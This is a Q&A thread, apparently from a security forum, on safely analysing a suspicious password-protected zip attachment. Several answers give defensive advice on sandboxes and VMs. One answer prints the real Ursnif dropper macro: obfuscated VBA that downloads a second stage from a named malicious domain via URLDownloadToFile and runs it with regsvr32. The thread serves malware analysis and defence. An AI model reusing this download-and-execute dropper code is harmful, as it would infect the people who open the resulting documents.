10

I have recently received an e-mail from an existing support group e-mail box with the following characteristics:

  • written in the language used in company's HQ (different from English which is the primary communication language)
  • had a zip attachment
  • provides a clear password for the attachment
  • is a reply of a legitimate e-mail I have received from a colleague a few months ago

This seems to be similar to what is described here, so there is very high chance to have received an infected file. After a couple of hours, our security department sent an e-mail related to similar cases happening inside the company.

I am wondering about how to find out the exact nature of the threat in a secure way. I have tried the following (only the first step inside the company, the rest within a VM):

  • checked on VirusTotal, but received 0% detection which makes sense since the engines cannot scan the encrypted archive
  • Checked with the Nanoav which boast about scanning password protected archives, but it does not allow to input the password
  • opened the archive with 7zip and saw a document inside
  • extracted the file using 7zip and uploaded the document to VirusTotal => 13+ engines detected something weird.

Do previewing and extracting the archive impose any security risk or is it only the document inside that can be infected? (in this case it seems to employ a macro).

Question: How to quickly find out what exactly the threat nature of a password protected archive without getting infected?

Glorfindel
  • 2,235
  • 6
  • 18
  • 30
Alexei
  • 2,183
  • 3
  • 9
  • 23
  • 2
    Why not take the thing to your security department? If you don't, won't you be risking your job as well? If you must play with it personally get a cheap spare computer that isn't connected to anything at all, and let that take the strain. – Robbie Goodwin May 27 '20 at 22:57
  • @RobbieGoodwin My security department already knows about it as mentioned in the post. This is a personal curiosity. `Ángel`'s answer mentions a service to scan password protected files (what seems to solve my request), but it fails to work for my particular file. – Alexei May 28 '20 at 14:43
  • I spin up virtual machines as sandboxes with only a firewalled loopback network adapter for logging connection attempts.. The host and virtualizer should NOT be Windows based. And NOT Linux with Wine installed. – svin83 Feb 03 '21 at 16:17

4 Answers4

10

I am wondering about how to find out the exact nature of the threat in a secure way

Doing malware analysis yourself is pretty hard - malware is often designed so that it can't easily be reverse engineered. Your best bet is searching for the VirusTotal results - unfortunately, there may not be any definite information on what your specific malware does exactly. Also, if malware connects back to a server and downloads additional pieces, it might be impossible to tell, as those pieces could change at any time, or depending on the specific target.

Do previewing and extracting the archive impose any security risk

Unlikely, but possibly. Most run-of-the-mill malware relies on the user actively executing a file that contains code. There are several common ways to do that:

  • The simplest way is to just provide a .exe. There are some ways to hide the file extension so that it seems less suspicious (Windows has a bad habit of just hiding them)
  • Using a less-known file format, like .bat or .vbs, that are executable files too
  • By embedding macros in a Word document (or similar format). If you were to open such a document, Word would ask you if you wanted to execute the unsafe macro contents. Many users are trained to click "yes" on such a prompt, which would lead to executing the malware.

Likely, the encrypted zip is just a way of hiding the malicious contents from automated scanners that might detect a known malware.

But there is another possibility: the Malware might contain an actual exploit for a weakness in the software that you are running. That might be a known vulnerability relying on you using an outdated version (more likely) or even an undiscovered "zero-day" vulnerability (less likely). In that case, just viewing a "harmless" format like a .zip might lead to system compromise (although targeting a much more complex format like .docx or .pdf using a document inside the zip that would have to be opened is probably much more likely).

In any case, using a VM was definitely the safe choice - just make sure to not connect it to the Internet and dispose of it afterwards. By contacting your security department about it you definitely did the right thing - they might have the resources to further analyze the threat, or at least block those specific mails from going through.

ManfP
  • 521
  • 3
  • 9
  • how about the winrar exploit that was there for 19 years before anyone noticed? u can def get infected by extracting or even opening email therefore executing its javascript https://www.engadget.com/2019-03-15-winrar-bug-malware.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAAM1gcp24blZPBiTm2V7-kQNHB7c50Orgfxrrrlzf0uLT0dkOFW9WiQr1hMieiNSJWXsTKfufaVdA3w8_X4RMJUbdtJxBOCtw7LRJFwmwx_Fd5faGfBK1H1c5oZ50iiAxTTC-SS8nV6ANXMU916Ttx0HLccjzDB6tfxoHgcWFqWSs – Mr-Programs May 28 '20 at 08:40
  • That the bug was there for 19 years doesn't mean it has been exploited for that long. Like I said - it's a possibility, but all in all the less likely one. – ManfP May 28 '20 at 09:26
  • 1
    It could also be a "zip bomb", a crafted zip file that expands to the petabyte range when opened/extracted: https://en.wikipedia.org/wiki/Zip_bomb -- although that in itself is more of an inconvenience than a big security risk, I'd rather not face the inconvenience of the system misbehaving because of a full disk. – orithena May 28 '20 at 12:20
  • I think ManfP is correct, but also see [my question](https://security.stackexchange.com/q/128683/56961) about when the archive _is_ the payload. – Michael May 28 '20 at 14:57
  • you are stuck in a local minima of doing stuff with the zip, there could be more malware vectors on the mail thats why professionals unable js execution and use VMs. the truth is nobody knows what a zip could do to ur computer so u we do a tradeoff riskprobability VS hustle&whatsatrisk – Mr-Programs May 29 '20 at 16:41
8

Question: How to quickly find out what exactly the threat nature of a password protected archive without getting infected?

I will be answering this question. As you want "quick" results, you could do dynamic analysis on the malware. I recommend having a malware sandbox to do it for you.

You throw it in there. It runs,

  • it tells you who it is attempting to communicate with
  • files it spawned off
  • registry keys that are written
  • dlls used

With these information above, you should have a rough gist of what it does.

mallocation
  • 1,668
  • 5
  • 20
  • Code formatting should only be used for *code*, not for technical terms that are not code. See [When should code formatting be used for non-code text?](https://meta.stackoverflow.com/questions/254990/when-should-code-formatting-be-used-for-non-code-text) on [meta.se] – Charles Duffy May 28 '20 at 02:19
4

In addition to using a static analysis tool such VirusTotal, I would recommend a sandbox analyzer tool as well. You can find one online such as hybrid-analysis (I am not endorsing this software but merely giving a concrete example).

If you have experience with malware, you can perform a more in-depth analysis of the binary to determine if it is safe or not. Static analysis i.e. virus scanning of the binary is probably the least efficient method at preventing advanced malware.

Given that malicious individual(s) expect you to scan the file(s) before opening them, they will go extra length to try and "hide" as much of the contents as possible. These techniques include replacing static import table with dynamic one, unpacking obfuscated string (could be RC4 or AES) and invoking it at runtime via RunPE injection method leveraging "private" Windows exploits and more.

Kaspersky runs a really good blog on malware called Securelist where they go into depth of dissecting malware and explaining what each bit does and how it works. For example, they have an article which goes into basics of botnets (source). They also regularly publish so-called reports on malware so you can quickly catch up-to-date with the latest security developments (source). Their blog is really big so my suggestion would be to check out either categories or tags and see what fits your requirements the most.

Ps. I realize that Kaspersky is in a bit of hot water given some recent political developments, however, their blog is entirely educational (based on my interaction with it) and by no means an endorsement of Kaspersky as a commercial AV software.

Alexander K.
  • 193
  • 6
  • Hybrid analysis seems like a very good online tool. However, in my case I receive `Error! Failed unpacking archive, unknown error.` for the archive itself, despite entering its password in the runtime options. I can submit the document itself, but that I could directly to VirusTotal anyway. – Alexei May 28 '20 at 04:32
  • As a workaround, you can try adding a small batch script to extract archive in sandbox environment if their built-in extraction fails. Alternatively, you can spin up a virtual machine (isolated) where you would extract the document/binary and then submit that to online sandbox. While running your own VM is similar to online sandbox, online sandbox gives you better reporting. – Alexander K. May 28 '20 at 09:16
4

Just that unexpected password-protected zip attachment with the clear password included in the mail would make me suspicious.

Not all password protected zips are malicious, but if you are encrypting a document to protect it from prying eyes, it would be preferable to send that separately through a different medium (such as a phone call). It is also uncommon to do this. The context would also matter. Perhaps we were expecting certain document and we talked that we wanted to send it encrypted. Or we know that this guy always sends us the documents this way.

The fact that it is a reply of a legitimate e-mail could have given it more credibility in the past. Not so after Emotet abused it so much on its campaigns. As this is indeed malicious, it means a recipient of that email it is "replying" to has been compromised (probably recently, perhaps in the past and it's now fixed. In case of doubt, change their credentials).

In order to be analyzed, you will usually need to provide the extracted file. As you mention, this might pose a risk if file preview unexpectedly runs the potential payload (e.g. a exploit). In this specific case, it would be safe to only open it with macros disabled, but you could easily infect yourself when playing with malware samples. It's good thing you used a virtual machine for any study into the document.

Analyzing the document, it is just a normal macro virus. Opening it shows the usual lure to make you enable document edition (and thus allow macros to run): Dieses Dokument wurde in der vorherigen
(source: 16bits.net)

The malicious action is executed through document macros:

Sub AutoOpen()
Dim ij As New OG
ij.W Kd("$+1", 0), Kd("$+1", 1)
Dim It As New H

It.b "regsvr32 " + Kd("$+1", 1)
End Sub

Method W of class OG is just a wrapper of URLDownloadToFile function from urlmon.dll:

Public Function W(JQ, i7)
dD = URLDownloadToFile(0&, JQ, i7, 0&, 0&)
End Function

Thus, it downloads url Kd("$+1", 0) saving it to Kd("$+1", 1). Kd is just a function which returns one of two strings that were defined above in a function called s(), obfuscated with intermixed "$+1" strings and "%%%" as separator:

arr(0) = "h$+1t$+1t$+1p$+1:$+1/$+1/$+1h$+1e$+1r$+1z$+1q$+1v$+1t$+1p$+1b$+19$+19$+1m$+10$+1c$+1n$+1.$+1c$+1o$+1m$+1/$+1g$+1g$+18$+18$+1w$+1"
arr(1) = "y$+1a$+1f$+1t$+1c$+1x$+1r$+17$+1g$+1u$+1/$+1w$+1o$+10$+1z$+1z$+1.$+1p$+1h$+1p$+1?$+1l$+1=$+1s$+1f$+1z$+1s$+18$+1.$+1c$+1a$+1b$+1"
arr(2) = "%$+1%$+1%$+1c$+1:$+1\$+1p$+1r$+1o$+1g$+1r$+1a$+1m$+1d$+1a$+1t$+1a$+1\$+14$+17$+19$+10$+15$+12$+19$+17$+1.$+1d$+1a$+1t$+1"

So, it downloads the file from hxxp://herzqvtpb99m0cn[.]com/gg88wyaftcxr7gu/wo0zz.php?l=sfzs8.cab and saves it to c:\programdata\47905297.dat

Method b of class H is just hiding WshShell.exec

In summary, your document downloads a file from the shady domain herzqvtpb99m0cn dot com (registered a few days ago, on 2020-05-25T12:23:49Z), saves it on c:\programdata and runs it through regsvr32

Its dns servers (at dnspod.com) do not resolve the domain now, so that's as far as we can directly analyze it.

There is an entry for this url on https://urlhaus.abuse.ch/url/369399/ According to the information there, it was a sample of the Ursnif malware.

Conclusion: Your document is a dropper that will run a second stage, probably a binary of the ursnif malware family.

Glorfindel
  • 2,235
  • 6
  • 18
  • 30
Ángel
  • 17,578
  • 3
  • 25
  • 60